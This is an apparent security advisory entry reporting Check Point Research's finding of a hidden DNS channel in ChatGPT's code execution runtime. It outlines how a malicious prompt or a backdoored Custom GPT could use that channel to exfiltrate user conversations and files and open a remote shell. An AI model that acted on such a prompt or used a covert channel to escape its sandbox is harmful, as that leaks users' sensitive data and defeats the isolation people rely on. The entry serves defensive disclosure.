← CVE Watch
TH-05high

ChatGPT Code Execution Runtime — Hidden DNS Outbound Channel Enables Data Exfiltration

chatgptdata-exfiltrationsandbox-escapednsagentic-security

Check Point Research discovered that ChatGPT's code execution runtime — documented by OpenAI as a secure environment that "cannot generate direct outbound network requests" — contained a hidden DNS-based communication channel to the public internet.

A single malicious prompt could activate this channel to silently exfiltrate user messages, uploaded files, and other sensitive conversation content to external attacker-controlled servers, bypassing OpenAI's stated safeguards. The same hidden path enabled establishing a remote shell inside the Linux runtime used for code execution. A backdoored Custom GPT could abuse the same weakness to harvest data from any user who engaged with it.

Any enterprise or individual that shared sensitive data (contracts, medical records, source code, financial documents) in ChatGPT sessions prior to February 20, 2026 was operating under a false isolation assumption — the documented sandbox guarantee was not technically enforced at the network layer.

Immediate action: Treat any sensitive data shared with ChatGPT before February 20, 2026 as potentially exposed; implement strict enterprise policies requiring AI platforms to provide verifiable (not just documented) network isolation before handling regulated data; do not rely on vendor documentation alone for sandbox isolation claims.